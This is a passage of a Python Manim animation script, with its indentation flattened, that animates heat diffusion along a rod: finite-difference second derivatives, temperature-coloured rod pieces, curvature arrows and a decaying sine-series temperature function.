y_change = np.zeros(points.shape[0])
dx = points[1][0] - points[0][0]
for i in range(len(points)):
p = points[i]
lp = points[max(i - 1, 0)]
rp = points[min(i + 1, len(points) - 1)]
d2y = (rp[1] - 2 * p[1] + lp[1])
if (0 < i < len(points) - 1):
second_deriv = d2y / (dx**2)
else:
second_deriv = 2 * d2y / (dx**2)
# second_deriv = 0
y_change[i] = alpha * second_deriv * dt / n_mini_steps
# y_change[0] = y_change[1]
# y_change[-1] = y_change[-2]
# y_change[0] = 0
# y_change[-1] = 0
# y_change -= np.mean(y_change)
points[:, 1] += y_change
graph.set_points_smoothly(points)
return graph
def get_second_derivative(self, x, dx=0.001):
graph = self.graph
x_min = self.graph_x_min
x_max = self.graph_x_max
ly, y, ry = [
graph.point_from_proportion(
inverse_interpolate(x_min, x_max, alt_x)
)[1]
for alt_x in (x - dx, x, x + dx)
]
# At the boundary, don't return the second deriv,
# but instead something matching the Neumann
# boundary condition.
if x == x_max:
return (ly - y) / dx
elif x == x_min:
return (ry - y) / dx
else:
d2y = ry - 2 * y + ly
return d2y / (dx**2)
def get_rod(self, x_min, x_max, n_pieces=None):
if n_pieces is None:
n_pieces = self.default_n_rod_pieces
axes = self.axes
line = Line(axes.c2p(x_min, 0), axes.c2p(x_max, 0))
rod = VGroup(*[
Square()
for n in range(n_pieces)
])
rod.arrange(RIGHT, buff=0)
rod.match_width(line)
rod.set_height(0.2, stretch=True)
rod.move_to(axes.c2p(x_min, 0), LEFT)
rod.set_fill(opacity=1)
rod.set_stroke(width=1)
rod.set_sheen_direction(RIGHT)
self.color_rod_by_graph(rod)
return rod
def update_rods(self, rods):
for rod in rods:
self.color_rod_by_graph(rod)
def color_rod_by_graph(self, rod):
for piece in rod:
piece.set_color(color=[
self.rod_point_to_color(piece.get_left()),
self.rod_point_to_color(piece.get_right()),
])
def rod_point_to_graph_y(self, point):
axes = self.axes
x = axes.x_axis.p2n(point)
graph = self.graph
alpha = inverse_interpolate(
self.graph_x_min,
self.graph_x_max,
x,
)
return axes.y_axis.p2n(
graph.point_from_proportion(alpha)
)
def y_to_color(self, y):
y_max = self.max_temp
y_min = self.min_temp
alpha = inverse_interpolate(y_min, y_max, y)
return temperature_to_color(interpolate(-0.8, 0.8, alpha))
def rod_point_to_color(self, point):
return self.y_to_color(
self.rod_point_to_graph_y(point)
)
class ShowEvolvingTempGraphWithArrows(BringTwoRodsTogether):
CONFIG = {
"alpha": 0.1,
"arrow_xs": np.linspace(0, 10, 22)[1:-1],
"arrow_scale_factor": 0.5,
"max_magnitude": 1.5,
"wait_time": 30,
"freq_amplitude_pairs": [
(1, 0.5),
(2, 1),
(3, 0.5),
(4, 0.3),
(5, 0.3),
(7, 0.2),
(21, 0.1),
(41, 0.05),
],
}
def construct(self):
self.add_axes()
self.add_graph()
self.add_clock()
self.add_rod()
self.add_arrows()
self.initialize_updaters()
self.let_play()
def add_axes(self):
self.setup_axes()
self.add(self.axes)
def add_graph(self):
self.setup_graph()
self.add(self.graph)
def add_clock(self):
self.setup_clock()
self.add(self.clock)
self.add(self.time_label)
self.time_label.next_to(self.clock, DOWN)
def add_rod(self):
rod = self.rod = self.get_rod(
self.graph_x_min,
self.graph_x_max,
)
self.add(rod)
def add_arrows(self):
graph = self.graph
x_min = self.graph_x_min
x_max = self.graph_x_max
xs = self.arrow_xs
arrows = VGroup(*[Vector(DOWN) for x in xs])
asf = self.arrow_scale_factor
def update_arrows(arrows):
for x, arrow in zip(xs, arrows):
d2y_dx2 = self.get_second_derivative(x)
mag = asf * np.sign(d2y_dx2) * abs(d2y_dx2)
mag = np.clip(
mag,
-self.max_magnitude,
self.max_magnitude,
)
arrow.put_start_and_end_on(
ORIGIN, mag * UP
)
point = graph.point_from_proportion(
inverse_interpolate(x_min, x_max, x)
)
arrow.shift(point - arrow.get_start())
arrow.set_color(
self.rod_point_to_color(point)
)
arrows.add_updater(update_arrows)
self.add(arrows)
self.arrows = arrows
def initialize_updaters(self):
if hasattr(self, "graph"):
self.graph.add_updater(self.update_graph)
if hasattr(self, "rod"):
self.rod.add_updater(self.color_rod_by_graph)
if hasattr(self, "time_label"):
self.time_label.add_updater(
lambda d, dt: d.increment_value(dt)
)
def let_play(self):
self.run_clock(self.wait_time)
def run_clock(self, time):
self.play(
ClockPassesTime(
self.clock,
run_time=time,
hours_passed=time,
),
)
#
def temp_func(self, x, t):
new_x = TAU * x / 10
return 50 + 20 * np.sum([
amp * np.sin(freq * new_x) *
np.exp(-(self.alpha * freq**2) * t)
for freq, amp in self.freq_amplitude_pairs
])
def initial_function(self, x, time=0):
return self.temp_func(x, 0)
| nadav7679/phase_field_Ni_batteries | manim_anim.py | manim_anim.py | py | 11,722 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.